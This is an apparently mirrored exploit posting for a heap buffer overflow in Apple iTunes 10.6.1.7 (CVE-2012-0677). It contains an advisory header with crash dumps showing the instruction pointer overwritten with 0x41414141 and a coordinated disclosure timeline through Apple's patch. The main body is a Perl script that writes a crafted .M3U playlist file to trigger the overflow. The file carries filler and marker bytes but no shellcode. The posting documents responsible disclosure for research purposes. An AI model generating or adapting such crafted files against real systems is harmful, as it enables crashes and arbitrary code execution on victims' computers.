Apple iTunes 10.6.1.7 M3U Playlist Buffer Overflow
来源:zeroscience.mk 作者:LiquidWorm 发布时间:2012-06-13  
#!/usr/bin/perl
#
#
# Apple iTunes 10.6.1.7 M3U Playlist File Walking Heap Buffer Overflow
#
#
# Vendor: Apple Inc.
# Product web page: http://www.apple.com
# Affected version: 10.6.1.7 and 10.6.0.40
#
# Summary: iTunes is a free application for your Mac or PC. It lets you
# organize and play digital music and video on your computer. It can
# automatically download new music, app, and book purchases across all
# your devices and computers. And it’s a store that has everything you
# need to be entertained. Anywhere. Anytime.
#
# Desc: The vulnerability is caused due to a boundary error in the processing
# of a playlist file, which can be exploited to cause a heap based buffer
# overflow when a user opens e.g. a specially crafted .M3U file. Successful
# exploitation could allow execution of arbitrary code on the affected node.
#
#
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
# (940.fc0): Access violation - code c0000005 (!!! second chance !!!)
# eax=41414141 ebx=08508cd8 ecx=41414141 edx=052a6528 esi=052a64b0 edi=0559ef20
# eip=41414141 esp=0012d8e8 ebp=7c90ff2d iopl=0         nv up ei pl nz na pe nc
# cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
# <Unloaded_Card.dll>+0x41414130:
# 41414141 ??              ???
#
# ~~~
#
# (6b0.a04): Access violation - code c0000005 (!!! second chance !!!)
# eax=41414141 ebx=00000000 ecx=00000014 edx=41414141 esi=41414141 edi=0187e10d
# eip=0187deec esp=0b0cfcd0 ebp=0b0cfcf0 iopl=0         nv up ei pl nz na pe nc
# cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
# Defaulted to export symbols for C:\Program Files\Common Files\Apple\Apple Application Support\CoreFoundation.dll -
# CoreFoundation!CFWriteStreamCreateWithAllocatedBuffers+0x40:
# 0187deec 8b00            mov     eax,dword ptr [eax]  ds:0023:41414141=????????
#
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
#
# Tested on: Microsoft Windows XP Professional SP3 EN (32bit)
#            Microsoft Windows 7 Ultimate SP1 EN (64bit)
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#                             Zero Science Lab - http://www.zeroscience.mk
#
#
# Vendor status:
#
# [13.03.2012] Vulnerability discovered in version 10.6.0.40.
# [29.03.2012] Vulnerability present in version 10.6.1.7.
# [11.05.2012] Vendor contacted.
# [11.05.2012] Vendor responds asking more details.
# [11.05.2012] Sent detailed information and PoC code to the vendor.
# [12.05.2012] Vendor begins investigation.
# [14.05.2012] Asked vendor for confirmation.
# [17.05.2012] Vendor confirms the vulnerability, developing patch.
# [17.05.2012] Requested a scheduled patch release date from vendor.
# [18.05.2012] Vendor replies.
# [06.06.2012] Asked vendor for status update.
# [08.06.2012] Vendor shares information about security update.
# [11.06.2012] Vendor releases version 10.6.3 to address this issue.
# [12.06.2012] Coordinated public security advisory released.
#
#
# Advisory ID: ZSL-2012-5093
# Advisory URL: http://zeroscience.mk/en/vulnerabilities/ZSL-2012-5093.php
# Advisory TXT: http://www.zeroscience.mk/codes/itunes_bof.txt
#
# Apple ID: APPLE-SA-2012-06-11-1
# Apple Advisory #1: http://support.apple.com/kb/HT5318
# Apple Advisory #2: http://support.apple.com/kb/HT1222
#
# CVE ID: CVE-2012-0677
# CVE URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=2012-0677
#
#
# 13.03.2012
#

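use strict;
use warnings;

# Proof-of-concept reproducer for CVE-2012-0677 (ZSL-2012-5093): it writes a
# crafted .M3U playlist whose long run of 0x41 bytes trips the boundary error
# described in the header above (the 0x41414141 values in the crash dumps).
# The vendor fixed this in iTunes 10.6.3. The script only composes the file
# on disk; it does not launch or interact with iTunes.
#
# Output layout, in write order (raw bytes, no encoding layer):
#   $WALK      "#EXTM3U\r" (the M3U magic line) followed by the 0x41 filler
#   $LIKE      four 0x42 ('B') marker bytes
#   $AN        four 0x44 ('D') marker bytes
#   $EGYPTIAN  16560 x 0x43 ('C') trailing filler
my $FILE = "HIEROGLYPH.m3u";
my $AN = "\x44\x44\x44\x44";
my $EGYPTIAN = "\x43" x 16560;
my $LIKE = "\x42\x42\x42\x42";






                                                         #######
                                                     #OOOOOOOOOOY
                                                   my $WALK="\x23\x45".                       "\x58\x54\x4D\x33".
                                                  "\x55\x0D\x41\x41\x41".                   "\x41\x41\x41".
                                                "\x41\x41\x41\x41\x41\x41".                 "\x41\x41".
                                              "\x41\x41\x41\x41".    "\x41".                "\x41\x41".
                                             "\x41\x41\x41\x41\x41\x41\x41".                "\x41\x41".
                                            "\x41\x41\x41\x41\x41\x41\x41\x41".            "\x41\x41".
                                           "\x41\x41\x41\x41\x41\x41\x41\x41".             "\x41\x41".
                                          "\x41\x41\x41\x41\x41\x41\x41\x41".              "\x41\x41".
                                         "\x41\x41\x41\x41\x41\x41\x41\x41".               "\x41\x41".
                                        "\x41\x41\x41\x41\x41\x41\x41\x41".                "\x41\x41".
                                        "\x41\x41\x41\x41\x41\x41".    "\x41".            "\x41\x41".
                                                    "\x41\x41\x41".      "\x41".          "\x41\x41".
                       "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
                      "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
                      "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
                     "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
                     "\x41\x41".           "\x41\x41\x41\x41\x41\x41\x41\x41".
                     "\x41\x41".             "\x41\x41\x41\x41\x41\x41\x41".
                    "\x41\x41".              "\x41\x41\x41\x41\x41\x41\x41".
                    "\x41\x41".                "\x41\x41\x41\x41\x41\x41".
                    "\x41\x41".                "\x41\x41\x41\x41\x41\x41".
                    "\x41\x41".                  "\x41\x41\x41\x41\x41".
                    "\x41\x41".                  "\x41\x41\x41\x41\x41".
                   "\x41\x41".                   "\x41\x41\x41\x41\x41".
                   "\x41\x41".                     "\x41\x41\x41\x41".
               "\x41\x41\x41".                     "\x41\x41\x41\x41".
         "\x41\x41\x41\x41".                       "\x41\x41\x41\x41".
                                                     "\x41\x41\x41".
                                                     "\x41\x41\x41".
                                                     "\x41\x41\x41".
                                                    "\x41\x41\x41\x41".
                                                    "\x41\x41\x41\x41".
                                                  "\x41\x41\x41\x41\x41".
                                                  "\x41\x41\x41\x41\x41".
                                                 "\x41\x41\x41\x41\x41\x41".
                                               "\x41\x41\x41\x41\x41\x41\x41".
                                               "\x41\x41\x41\x41\x41\x41\x41".
                                              "\x41\x41\x41\x41\x41\x41\x41\x41".
                                              "\x41\x41\x41\x41\x41\x41\x41\x41".
                                             "\x41\x41\x41\x41\x41\x41\x41\x41".
                                           "\x41\x41\x41\x41\x41\x41\x41\x41\x41".
                                           "\x41\x41\x41\x41\x41\x41\x41\x41\x41".
                                          "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
                                         "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
                                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
                                       "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
                                     "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
                                    "\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41".
                                   "\x41\x41\x41\x41\x41\x41".        "\x41\x41\x41".
                                  "\x41\x41\x41\x41\x41".               "\x41\x41\x41".
                                        "\x41\x41\x41".                 "\x41\x41\x41".
                                        "\x41\x41\x41".                  "\x41\x41\x41".
                                       "\x41\x41\x41".                    "\x41\x41\x41".
                                       "\x41\x41\x41".                    "\x41\x41\x41".
                                        "\x41\x41".                          "\x41\x41".
                                       "\x41\x41".                           "\x41\x41".
                                       "\x41\x41".                           "\x41\x41".
                                      "\x41\x41".                             "\x41\x41".
                                      "\x41\x41".                              "\x41\x41".
                                     "\x41\x41".                               "\x41\x41".
                                    "\x41\x41".                                 "\x41\x41".
                                   "\x41\x41".                                  "\x41\x41".
                                  "\x41\x41".                                    "\x41\x41".
                                 "\x41\x41".                                      "\x41\x41".
                                "\x41\x41".                                       "\x41\x41".
                               "\x41\x41".                                         "\x41\x41".
                               "\x41\x41".                                          "\x41\x41".
                              "\x41\x41".                                           "\x41\x41".
                              "\x41\x41".                                            "\x41\x41".
                             "\x41\x41\x41".                                        "\x41\x41\x41".
                            "\x41\x41\x41\x41".                                     "\x41\x41\x41\x41".
                            "\x41\x41\x41\x41\x41".                                 "\x41\x41\x41\x41\x41".
                              "\x41\x41\x41\x41\x41\x41".                             "\x41\x41\x41\x41\x41\x41".
          "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
          "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
          "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
          "\x41\x41".                                                                                                 "\x41\x41".
          "\x41\x41".                                                                                                 "\x41\x41".
          "\x41\x41".                                                                                                 "\x41\x41".
          "\x41\x41".                                                                                                 "\x41\x41".
          "\x41\x41".                                                                                                 "\x41\x41".
          "\x41\x41".                                                                                                 "\x41\x41".
          "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
          "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
          "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41" x 7691;








# Assemble the file body in the order given by the layout comment at the top.
my $CRYPT = $WALK.$LIKE.$AN.$EGYPTIAN;
print "\n\n[+] Creating $FILE file...\n";

# Three-argument open on a lexical handle, joined with low-precedence `or`:
# the original `">./$FILE" || die ...` bound `||` to the filename string, so
# the die could never fire and a failed open went unreported.
open my $out, '>', "./$FILE" or die "\n[-] Can't open $FILE: $!\n\n";
# The content is raw bytes; keep any platform I/O layer from translating it.
binmode $out;
print {$out} $CRYPT or die "\n[-] Can't write $FILE: $!\n\n";
# Buffered write errors only surface at close, so report success afterwards.
close $out or die "\n[-] Can't close $FILE: $!\n\n";
print "\n[+] File successfully composed!\n\n";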

 